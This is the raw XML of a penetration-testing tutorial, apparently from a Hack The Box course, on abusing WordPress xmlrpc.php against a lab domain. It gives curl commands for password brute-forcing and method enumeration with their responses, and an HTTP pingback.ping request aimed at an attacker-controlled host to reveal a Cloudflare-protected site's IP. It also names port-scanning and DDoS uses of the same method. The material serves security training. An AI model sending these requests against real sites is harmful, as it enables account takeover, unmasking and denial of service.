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816E5A" wp14:paraId="435577F8" wp14:textId="4F27270A">
      <w:pPr>
        <w:pStyle w:val="Heading1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Attacking WordPress 'xmlrpc.php'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="2BCE6DE1" wp14:textId="61B1619C">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="4D3B8400" wp14:textId="752EBE39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It is important to note that xmlrpc.php being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed, xmlrpc.php can facilitate some enumeration and exploitation activities, though.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="17DF1C63" wp14:textId="0DB17925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Let us borrow an example from our </w:t>
      </w:r>
      <w:hyperlink r:id="Raea31feeeac64e73">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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Hacking Wordpress</w:t>
        </w:r>
      </w:hyperlink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module.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="43396AF1" wp14:textId="55ABD961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Suppose we are assessing the security of a WordPress instance residing in </w:t>
      </w:r>
      <w:hyperlink r:id="Rbcee1eb659194ab7">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5A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it-IT"/>
          </w:rPr>
          <w:t>http://blog.inlanefreight.com</w:t>
        </w:r>
      </w:hyperlink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. Through enumeration activities, we identified a valid username, admin, and that xmlrpc.php is enabled. Identifying if xmlrpc.php is enabled is as easy as requesting xmlrpc.php on the domain we are assessing.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="5B529C24" wp14:textId="563CD82E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We can mount a password brute-forcing attack through xmlrpc.php, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="4E0FB93A" wp14:textId="208301AC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yovecio@htb[/htb]$ curl -X POST -d "&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;admin&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;CORRECT-PASSWORD&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;" </w:t>
      </w:r>
      <w:hyperlink r:id="Rae5a1d3cc20f4c3f">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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http://blog.inlanefreight.com/xmlrpc.php</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;methodResponse&gt;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&lt;params&gt;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&lt;param&gt;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&lt;value&gt;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&lt;array&gt;&lt;data&gt;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&lt;value&gt;&lt;struct&gt;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&lt;member&gt;&lt;name&gt;isAdmin&lt;/name&gt;&lt;value&gt;&lt;boolean&gt;1&lt;/boolean&gt;&lt;/value&gt;&lt;/member&gt;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&lt;member&gt;&lt;name&gt;url&lt;/name&gt;&lt;value&gt;&lt;string&gt;http://blog.inlanefreight.com/&lt;/string&gt;&lt;/value&gt;&lt;/member&gt;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&lt;member&gt;&lt;name&gt;blogid&lt;/name&gt;&lt;value&gt;&lt;string&gt;1&lt;/string&gt;&lt;/value&gt;&lt;/member&gt;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&lt;member&gt;&lt;name&gt;blogName&lt;/name&gt;&lt;value&gt;&lt;string&gt;Inlanefreight&lt;/string&gt;&lt;/value&gt;&lt;/member&gt;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&lt;member&gt;&lt;name&gt;xmlrpc&lt;/name&gt;&lt;value&gt;&lt;string&gt;http://blog.inlanefreight.com/xmlrpc.php&lt;/string&gt;&lt;/value&gt;&lt;/member&gt;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&lt;/struct&gt;&lt;/value&gt;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&lt;/data&gt;&lt;/array&gt;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&lt;/param&gt;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&lt;/params&gt;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&lt;/methodResponse&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="223444FE" wp14:textId="58668099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Above, you can see a successful login attempt through xmlrpc.php.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="3DCDDF68" wp14:textId="04D1D544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We will receive a 403 faultCode error if the credentials are not valid.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="5324EDC1" wp14:textId="7E7F7D05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yovecio@htb[/htb]$ curl -X POST -d "&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;admin&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;WRONG-PASSWORD&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;" </w:t>
      </w:r>
      <w:hyperlink r:id="R4bdde5a390ea4cfb">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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http://blog.inlanefreight.com/xmlrpc.php</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;methodResponse&gt;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&lt;fault&gt;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&lt;value&gt;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&lt;struct&gt;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&lt;member&gt;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&lt;name&gt;faultCode&lt;/name&gt;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&lt;value&gt;&lt;int&gt;403&lt;/int&gt;&lt;/value&gt;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&lt;/member&gt;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&lt;member&gt;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&lt;name&gt;faultString&lt;/name&gt;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&lt;value&gt;&lt;string&gt;Incorrect username or password.&lt;/string&gt;&lt;/value&gt;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&lt;/member&gt;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&lt;/struct&gt;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&lt;/fault&gt;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&lt;/methodResponse&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="4EEA9E0C" wp14:textId="74A27C83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You may ask how we identified the correct method to call (</w:t>
      </w:r>
      <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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system.listMethods</w:t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). We did that by going through the well-documented </w:t>
      </w:r>
      <w:hyperlink r:id="R7be37cafd54f41c6">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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Wordpress code</w:t>
        </w:r>
      </w:hyperlink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and interacting with xmlrpc.php, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="7AC7D07A" wp14:textId="0156133F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yovecio@htb[/htb]$ curl -s -X POST -d "&lt;methodCall&gt;&lt;methodName&gt;system.listMethods&lt;/methodName&gt;&lt;/methodCall&gt;" </w:t>
      </w:r>
      <w:hyperlink r:id="R9deefaf2c5cd46e2">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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http://blog.inlanefreight.com/xmlrpc.php</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;methodResponse&gt;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&lt;params&gt;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&lt;param&gt;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&lt;value&gt;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&lt;array&gt;&lt;data&gt;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&lt;value&gt;&lt;string&gt;system.multicall&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;system.listMethods&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;system.getCapabilities&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;demo.addTwoNumbers&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;demo.sayHello&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;pingback.extensions.getPingbacks&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;pingback.ping&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.publishPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.getTrackbackPings&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.supportedTextFilters&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.supportedMethods&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.setPostCategories&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.getPostCategories&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.getRecentPostTitles&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;mt.getCategoryList&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.getUsersBlogs&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.deletePost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.newMediaObject&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.getCategories&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.getRecentPosts&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.getPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.editPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;metaWeblog.newPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.deletePost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.editPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.newPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.getRecentPosts&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.getPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.getUserInfo&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;blogger.getUsersBlogs&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.restoreRevision&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getRevisions&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPostTypes&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPostType&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPostFormats&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getMediaLibrary&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getMediaItem&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getCommentStatusList&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.newComment&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.editComment&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.deleteComment&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getComments&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getComment&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.setOptions&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getOptions&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPageTemplates&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPageStatusList&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPostStatusList&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getCommentCount&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.deleteFile&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.uploadFile&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.suggestCategories&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.deleteCategory&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.newCategory&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getTags&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getCategories&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getAuthors&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPageList&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.editPage&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.deletePage&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.newPage&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPages&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPage&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.editProfile&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getProfile&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getUsers&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getUser&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getTaxonomies&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getTaxonomy&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getTerms&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getTerm&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.deleteTerm&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.editTerm&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.newTerm&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getPosts&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.deletePost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.editPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.newPost&lt;/string&gt;&lt;/value&gt;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&lt;value&gt;&lt;string&gt;wp.getUsersBlogs&lt;/string&gt;&lt;/value&gt;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&lt;/data&gt;&lt;/array&gt;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&lt;/param&gt;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&lt;/params&gt;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&lt;/methodResponse&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="6776F7FC" wp14:textId="04A870BE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Inside the list of available methods above, </w:t>
      </w:r>
      <w:hyperlink r:id="R1add44302eb54aad">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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pingback.ping</w:t>
        </w:r>
      </w:hyperlink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is included. pingback.ping allows for XML-RPC pingbacks. According to WordPress, </w:t>
      </w:r>
      <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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 xml:space="preserve">a </w:t>
      </w:r>
      <w:hyperlink r:id="R1da558e028fd4a6f">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5A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it-IT"/>
          </w:rPr>
          <w:t>pingback</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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 xml:space="preserve"> is a special type of comment that’s created when you link to another blog post, as long as the other blog is set to accept pingbacks.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="184B31EC" wp14:textId="1234AAA3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Unfortunately, if pingbacks are available, they can facilitate:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="115FC00B" wp14:textId="07F0FB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IP Disclosure - An attacker can call the pingback.ping method on a WordPress instance behind Cloudflare to identify its public IP. The pingback should point to an attacker-controlled host (such as a VPS) accessible by the WordPress instance.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="486EFB41" wp14:textId="7FBFC4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Cross-Site Port Attack (XSPA) - An attacker can call the pingback.ping method on a WordPress instance against itself (or other internal hosts) on different ports. Open ports or internal hosts can be identified by looking for response time differences or response differences.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="2C654626" wp14:textId="65AAC7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Distributed Denial of Service Attack (DDoS) - An attacker can call the pingback.ping method on numerous WordPress instances against a single target.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="78D6D5B1" wp14:textId="347122B4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Find below how an IP Disclosure attack could be mounted if xmlrpc.php is enabled and the pingback.ping method is available. XSPA and DDoS attacks can be mounted similarly.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="544811EE" wp14:textId="680760A7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Suppose that the WordPress instance residing in </w:t>
      </w:r>
      <w:hyperlink r:id="Re45117cbf25e43e8">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5A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it-IT"/>
          </w:rPr>
          <w:t>http://blog.inlanefreight.com</w:t>
        </w:r>
      </w:hyperlink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is protected by Cloudflare. As we already identified, it also has xmlrpc.php enabled, and the pingback.ping method is available.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="68F9576E" wp14:textId="6F5BF230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As soon as the below request is sent, the attacker-controlled host will receive a request (pingback) originating from </w:t>
      </w:r>
      <w:hyperlink r:id="Rc3d56974476a468d">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5A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it-IT"/>
          </w:rPr>
          <w:t>http://blog.inlanefreight.com</w:t>
        </w:r>
      </w:hyperlink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verifying the pingback and exposing </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5A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it-IT"/>
          </w:rPr>
          <w:t>http://blog.inlanefreight.com</w:t>
        </w:r>
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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's</w:t>
        </w:r>
      </w:hyperlink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public IP address.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="3671673D" wp14:textId="2759D36A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Code: http</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="010F811A" wp14:textId="19098EFE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--&gt; POST /xmlrpc.php HTTP/1.1 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Host: blog.inlanefreight.com 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Connection: keep-alive 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Content-Length: 293</w:t>
      </w:r>
      <w:r>
        <w:br/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&lt;methodCall&gt;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&lt;methodName&gt;pingback.ping&lt;/methodName&gt;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&lt;params&gt;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&lt;param&gt;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&lt;value&gt;&lt;string&gt;http://attacker-controlled-host.com/&lt;/string&gt;&lt;/value&gt;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&lt;/param&gt;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&lt;param&gt;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&lt;value&gt;&lt;string&gt;https://blog.inlanefreight.com/2015/10/what-is-cybersecurity/&lt;/string&gt;&lt;/value&gt;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&lt;/param&gt;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&lt;/params&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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>&lt;/methodCall&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="3488F964" wp14:textId="3E4CD788">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr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If you have access to our </w:t>
      </w:r>
      <w:hyperlink r:id="Rb221ecd96e3f407e">
        <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5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Hacking Wordpress</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="4B816E5A" w:rsidR="4B816E5A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module, please note that you won't be able to exploit the availability of the pingback.ping method against the related section's target, due to egress restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4B816E5A" wp14:paraId="2DC08235" wp14:textId="249469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367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286AA"/>
    <w:rsid w:val="4B816E5A"/>
    <w:rsid w:val="63E28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86AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BD29F3F3-2112-46AC-9536-6DFC614E8E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cademy.hackthebox.com/module/details/17" TargetMode="External" Id="Raea31feeeac64e73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.inlanefreight.com" TargetMode="External" Id="Rbcee1eb659194ab7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.inlanefreight.com/xmlrpc.php" TargetMode="External" Id="Rae5a1d3cc20f4c3f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.inlanefreight.com/xmlrpc.php" TargetMode="External" Id="R4bdde5a390ea4cfb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codex.wordpress.org/XML-RPC/system.listMethods" TargetMode="External" Id="R7be37cafd54f41c6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.inlanefreight.com/xmlrpc.php" TargetMode="External" Id="R9deefaf2c5cd46e2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codex.wordpress.org/XML-RPC_Pingback_API" TargetMode="External" Id="R1add44302eb54aad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.com/support/comments/pingbacks/" TargetMode="External" Id="R1da558e028fd4a6f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.inlanefreight.com" TargetMode="External" Id="Re45117cbf25e43e8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.inlanefreight.com" TargetMode="External" Id="Rc3d56974476a468d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academy.hackthebox.com/module/details/17" TargetMode="External" Id="Rb221ecd96e3f407e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R9b92288caca849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2023-12-14T10:32:14.8488013Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T10:32:36.6776377Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>